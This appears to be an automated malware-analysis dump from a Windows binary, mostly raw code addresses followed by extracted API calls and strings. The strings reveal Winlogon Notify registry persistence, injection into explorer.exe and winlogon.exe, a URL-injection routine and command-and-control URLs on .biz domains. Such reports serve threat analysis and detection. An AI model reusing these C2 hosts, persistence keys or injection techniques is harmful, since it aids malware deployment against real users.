0x00403c8b
0x00403c8b
0x00403c90
0x00000000
0x00000000
0x00403c92
0x00403c92
0x00403c95
0x00403c95
0x00403c98
0x00403c9d
0x00403c9d
0x00403ca2
0x00000000
0x00000000
0x00403ca4
0x00403ca4
0x00403ca7
0x00403ca7
0x00403caa
0x00403caf
0x00403caf
0x00403cb4
0x00000000
0x00000000
0x00403cb6
0x00403cb6
0x00403cb9
0x00403cb9
0x00403cbc
0x00403cc1
0x00403cc1
0x00403cc6
0x00000000
0x00000000
0x00403cc8
0x00403cc8
0x00403ccb
0x00403ccb
0x00403cce
0x00403cd3
0x00403cd3
0x00403cd8
0x00000000
0x00000000
0x00403cda
0x00403cda
0x00403cdd
0x00403cdd
0x00403ce0
0x00403ce5
0x00403ce5
0x00403cea
0x00000000
0x00000000
0x00403cec
0x00403cec
0x00403cef
0x00403cef
0x00403cf2
0x00403cf7
0x00403cf7
0x00403cfc
0x00000000
0x00000000
0x00403cfe
0x00403cfe
0x00403d01
0x00403d01
0x00403d04
0x00403d09
0x00403d09
0x00403d0e
0x00000000
0x00000000
0x00403d10
0x00403d10
0x00403d13
0x00403d13
0x00403d16
0x00403d1b
0x00403d1b
0x00403d20
0x00000000
0x00000000
0x00403d22
0x00403d22
0x00403d25
0x00403d25
0x00403d28
0x00403d2d
0x00403d2d
0x00403d32
0x00000000
0x00000000
0x00403d34
0x00403d34
0x00403d37
0x00403d37
0x00403d3a
0x00403d3f
0x00403d3f
0x00403d44
0x00000000
0x00000000
0x00403d46
0x00403d46
0x00403d49
0x00403d49
0x00403d4c
0x00403d51
0x00403d51
0x00403d56
0x00000000
0x00000000
0x00403d58
0x00403d58
0x00403d5b
0x00403d5b
0x00403d5e
0x00403d63
0x00403d63
0x00403d68
0x00000000
0x00000000
0x00403d6a
0x00403d6a
0x00403d6d
0x00403d6d
0x00403d70
0x00403d75
0x00403d75
0x00403d7a
0x00000000
0x00000000
0x00403d7c
0x00403d7c
0x00403d7f
0x00403d7f
0x00403d82
0x00403d87
0x00403d87
0x00403d8c
0x00000000
0x00000000
0x00403d8e
0x00403d8e
0x00403d91
0x00403d91
0x00403d94
0x00403d99
0x00403d99
0x00403d9e
0x00000000
0x00000000
0x00403da0
0x00403da0
0x00403da3
0x00403da3
0x00403da6
0x00403dab
0x00403dab
0x00403db0
0x00000000
0x00000000
0x00403db2
0x00403db2
0x00403db5
0x00403db5
0x00403db8
0x00403dbd
0x00403dbd
0x00403dc2
0x00000000
0x00000000
0x00403dc4
0x00403dc4
0x00403dc7
0x00403dc7
0x00403dca
0x00403dcf
0x00403dcf
0x00403dd4
0x00000000
0x00000000
0x00403dd6
0x00403dd6
0x00403dd9
0x00403dd9
0x00403ddc
0x00403de1
0x00403de1
0x00403de6
0x00000000
0x00000000
0x00403de8
0x00403de8
0x00403deb
0x00403deb
0x00403dee
0x00403df3
0x00403df3
0x00403df8
0x00000000
0x00000000
0x00403dfa
0x00403dfa
0x00403dfd
0x00403dfd
0x00403e05
0x00403e05
0x00403e0a
0x00000000
0x00000000
0x00403e0c
0x00403e0c
0x00403e0d
0x00403e0d
0x00403e17
0x00403e17
0x00403e1c
0x00000000
0x00000000
0x00403e1e
0x00403e1e
0x00403e1f
0x00403e1f
0x00403e29
0x00403e29
0x00403e2e
0x00000000
0x00000000
0x00403e30
0x00403e30
0x00403e31
0x00403e31
0x00403e4d
0x00403e52
0x00403e59
0x00403e5b
0x00403e5d
0x00403e60
0x00403e69
0x00403e86
0x00403e92
0x00403e97
0x00403e9e
0x00403ea5
0x00403eaa
0x00403eaa
0x00403e9e
0x00403e60
0x00403eb2
0x00403eb7
0x00403eb7
0x00403ebc
0x00000000
0x00000000
0x00403ebe
0x00403ec1
0x00403ec1
0x00403ec4
0x00403ec9
0x00403ec9
0x00403ece
0x00000000
0x00000000
0x00403ed0
0x00403ed0
0x00403ed3
0x00403ed3
0x00403ed6
0x00403ee2
0x00403ef3
0x00403f09
0x00403f1f
0x00403f35
0x00403f3a
0x00403f46
0x00403f4b
0x00403f51
0x00403f5d
0x00403f62
0x00403f63
0x00403f68
0x00403f6a
0x00403f6a
0x00403f70
0x00403f74
0x00403f79
0x00403f79
0x00403f7e
0x00000000
0x00000000
0x00403f80
0x00403f80
0x00403f83
0x00403f83
0x00403f86
0x00403f8b
0x00403f8b
0x00403f90
0x00000000
0x00000000
0x00403f92
0x00403f92
0x00403f95
0x00403f95
0x00403f98
0x00403f9d
0x00403f9d
0x00403fa2
0x00000000
0x00000000
0x00403fa4
0x00403fa4
0x00403fa7
0x00403fa7
0x00403faa
0x00403fb2
0x00403fb2
0x00403fc0
0x00403fd1
0x00403fd6
0x00403fda
0x00403fdd
0x00403fdf
0x00000000
0x00000000
0x00403fe5
0x00403fea
0x00403fef
0x0040426e
0x00404273
0x0040428c
0x00404299
0x0040429e
0x004042a0
0x004042b2
0x004042b7
0x004042be
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042c3
0x004042f7
0x004042fc
0x004044af
0x004044c6
0x004044cb
0x004044d2
0x004044d4
0x00404517
0x00404517
0x0040451f
0x0040451f
0x00404521
0x0040453f
0x00404545
0x0040454a
0x0040454f
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x00405509
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00405971
0x00405978
0x00405984
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x00405955
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00000000
0x00000000
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00000000
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b2e
0x00405b4c
0x00405b51
0x00405b53
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00000000
0x00405542
0x0040552e
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00000000
0x00405bee
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00000000
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00000000
0x0040565f
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00000000
0x00405658
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404edb
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cd5
0x00404cc9
0x00000000
0x00404cc9
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x00404b88
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x004047c4
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x004044d6
0x004044d9
0x00000000
0x00000000
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00000000
0x00404510
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433b
0x0040433d
0x004043b6
0x004043b6
0x004043bb
0x004043d4
0x004043d9
0x004043db
0x004043dd
0x004043df
0x004043e2
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043e2
0x004043dd
0x0040440d
0x00404412
0x0040442b
0x00404430
0x00404432
0x00404434
0x00404436
0x00404439
0x00404454
0x0040445a
0x0040445a
0x00404439
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040449c
0x0040449c
0x004044a1
0x004044a3
0x004044a8
0x004044a8
0x00000000
0x004044a8
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x00404369
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x00404398
0x0040439d
0x0040439f
0x00000000
0x00000000
0x004043a9
0x004043ae
0x004043b0
0x00000000
0x00000000
0x00000000
0x004043b0
0x00404371
0x00404376
0x00404378
0x00000000
0x00000000
0x00000000
0x00404378
0x00404275
0x00404279
0x00000000
0x00404279
0x00403ff5
0x00403ffa
0x0040425a
0x0040425f
0x00000000
0x00000000
0x00404267
0x00000000
0x00404267
0x00404004
0x00404009
0x0040400b
0x0040400d
0x0040416b
0x0040416b
0x00404170
0x00000000
0x00000000
0x0040418f
0x00404194
0x00404196
0x00000000
0x00000000
0x0040419c
0x004041c8
0x004041cd
0x004041cf
0x0040424c
0x00404253
0x00000000
0x00404253
0x004041d1
0x004041f9
0x004041fe
0x00404200
0x00404219
0x0040421e
0x00404220
0x00404220
0x00404226
0x00404226
0x00404231
0x00404236
0x0040423b
0x00404247
0x00404247
0x00000000
0x0040423b
0x0040401a
0x0040401f
0x00404023
0x00404025
0x0040405a
0x0040405a
0x0040405f
0x0040406a
0x00404074
0x00404074
0x00404077
0x0040407c
0x0040407c
0x0040407e
0x00000000
0x00000000
0x00404080
0x00404087
0x004040da
0x004040e3
0x00000000
0x004040e3
0x00404089
0x00404096
0x0040409b
0x0040409c
0x0040409e
0x004040a3
0x004040a5
0x004040b6
0x004040c4
0x004040c9
0x004040d0
0x004040d2
0x00000000
0x00000000
0x004040d4
0x004040d5
0x004040d8
0x00000000
0x00000000
0x00000000
0x004040d8
0x004040a7
0x004040ac
0x004040ad
0x004040b2
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040b4
0x004040eb
0x004040eb
0x004040ed
0x004040f2
0x004040f2
0x004040f4
0x00000000
0x00000000
0x004040ff
0x00404100
0x00404100
0x00404107
0x0040410c
0x0040410c
0x0040410c
0x0040410e
0x0040410e
0x00404110
0x00000000
0x00000000
0x0040411b
0x0040411c
0x0040411c
0x00404123
0x00404123
0x00404123
0x00404123
0x00404126
0x00404126
0x00404128
0x00404128
0x0040412a
0x00000000
0x00000000
0x00404138
0x00404144
0x00404145
0x00404145
0x0040414c
0x00404151
0x00404158
0x00404160
0x00404166
0x00404166
0x00000000
0x00404151
0x0040402d
0x00404036
0x0040403b
0x00404042
0x00404049
0x00404049
0x0040404b
0x00000000
0x00000000
0x00404055
0x00404057
0x00404057
0x00000000
0x0040427e
0x0040427e
0x0040427e
0x00403fb2
0x0040395a
0x0040395f
0x0040395f
0x00403964
0x00000000
0x00000000
0x00403966
0x00403969
0x00403969
0x0040396c
0x00403971
0x00403971
0x00403976
0x00000000
0x00000000
0x00403978
0x0040397b
0x0040397b
0x0040397e
0x00403983
0x00403983
0x00403988
0x00000000
0x00000000
0x0040398a
0x0040398d
0x0040398d
0x00403990
0x00403995
0x00403995
0x0040399a
0x00000000
0x00000000
0x0040399c
0x0040399f
0x0040399f
0x004039a2
0x004039a7
0x004039a7
0x004039ac
0x00000000
0x00000000
0x004039ae
0x004039b1
0x004039b1
0x004039c5
0x004039d5
0x004039e5
0x004039f5
0x004039ff
0x00000000
0x004039ff
0x004038ac
0x004038b1
0x004038b1
0x004038b6
0x00000000
0x00000000
0x004038b8
0x004038bb
0x004038bb
0x004038c9
0x00000000
0x004038c9
0x0040385c
0x00403861
0x00403861
0x00403866
0x00000000
0x00000000
0x00403868
0x0040386b
0x0040386b
0x00403879
0x00000000
0x00403879
0x004035b5
0x004035ba
0x004035ba
0x004035bf
0x00000000
0x00000000
0x004035c1
0x004035c4
0x004035c4
0x004035d2
0x004035d7
0x004035dc
0x004035dc
0x004035e1
0x00000000
0x00000000
0x004035e3
0x004035e6
0x004035e6
0x004035e9
0x004035ee
0x004035ee
0x004035f3
0x00000000
0x00000000
0x004035f5
0x004035f8
0x004035f8
0x004035fb
0x00403600
0x00403600
0x00403605
0x00000000
0x00000000
0x00403607
0x0040360a
0x0040360a
0x0040360d
0x00403612
0x00403612
0x00403617
0x00000000
0x00000000
0x00403619
0x0040361c
0x0040361c
0x0040361f
0x00403624
0x00403624
0x00403629
0x00000000
0x00000000
0x0040362b
0x0040362e
0x0040362e
0x0040363b
0x00403641
0x0040364e
0x0040365e
0x0040366e
0x00403673
0x00403678
0x0040367d
0x0040367f
0x00403681
0x00403691
0x00403691
0x00403693
0x00403698
0x00403698
0x0040369d
0x00000000
0x00000000
0x0040369f
0x004036a2
0x004036a2
0x004036a5
0x004036aa
0x004036aa
0x004036af
0x00000000
0x00000000
0x004036b1
0x004036b4
0x004036b4
0x004036bd
0x004036c2
0x004036c4
0x004036c6
0x00000000
0x00000000
0x004036d2
0x004036d7
0x004036d9
0x004036db
0x00000000
0x00000000
0x004036ed
0x004036ef
0x004036f1
0x00000000
0x00000000
0x004036f7
0x00403709
0x0040370f
0x0040371a
0x0040371c
0x0040371e
0x004037b2
0x004037b4
0x004037c0
0x00000000
0x004037c0
0x00403724
0x0040372c
0x0040372e
0x0040372e
0x00403732
0x00000000
0x00000000
0x00403734
0x00403738
0x0040373c
0x0040373e
0x004037a9
0x004037a9
0x00000000
0x004037a9
0x00403740
0x00403742
0x00000000
0x00000000
0x00403744
0x0040374c
0x00403750
0x00403755
0x00403767
0x00403767
0x0040377c
0x00403783
0x00403785
0x00403787
0x00403789
0x0040378b
0x0040378f
0x00403791
0x00403795
0x00403797
0x00403797
0x00403795
0x0040378f
0x0040379c
0x004037a1
0x00000000
0x004037a1
0x00403757
0x00403760
0x00403759
0x00403759
0x00403759
0x00403765
0x00000000
0x00000000
0x00000000
0x00000000
0x00403765
0x00000000
0x0040372e
0x004034ce
0x004034d3
0x004034da
0x004034dc
0x00000000
0x00000000
0x004034e7
0x004034f5
0x004034f5
0x004034f7
0x0040350a
0x0040350f
0x0040350f
0x00403511
0x00000000
0x00000000
0x0040351a
0x00403521
0x0040359f
0x00000000
0x0040359f
0x00403532
0x00403532
0x00403540
0x00403545
0x00403547
0x00000000
0x00000000
0x00403550
0x00403556
0x0040355b
0x00403563
0x0040449c
0x00000000
0x0040449c
0x00403478
0x0040347d
0x0040347d
0x00403482
0x00000000
0x00000000
0x00403484
0x00403487
0x00403487
0x00403490
0x00403495
0x00403497
0x0040349d
0x0040349d
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 00403421
GetVersionExA.KERNEL32(004120F0), ref: 0040343A

Strings

_Classes, xrefs: 004038DA
gymspzd.dll, xrefs: 00403A58
--k33p, xrefs: 0040343F, 004034B8
winrnt.exe, xrefs: 00403A10
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy, xrefs: 00403F86
explorer.exe, xrefs: 00403D16
winlogon.exe, xrefs: 00403D04
GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00403BC0
museum, xrefs: 00403B9C
qnd_b__-12, xrefs: 00403F74, 00403FC5
urlinj_creat_f, xrefs: 00403C2C
UseDflProfile, xrefs: 00403C86
http://utbidet-ugeas.biz/d/cc, xrefs: 00403C98
{38383738-3439-3838-3738-343938383738}, xrefs: 004048CA, 004048FB
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}, xrefs: 00403A46
Default Flags, xrefs: 00403F98
http://%s.biz/d/G?, xrefs: 00403AC4
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 004038FE
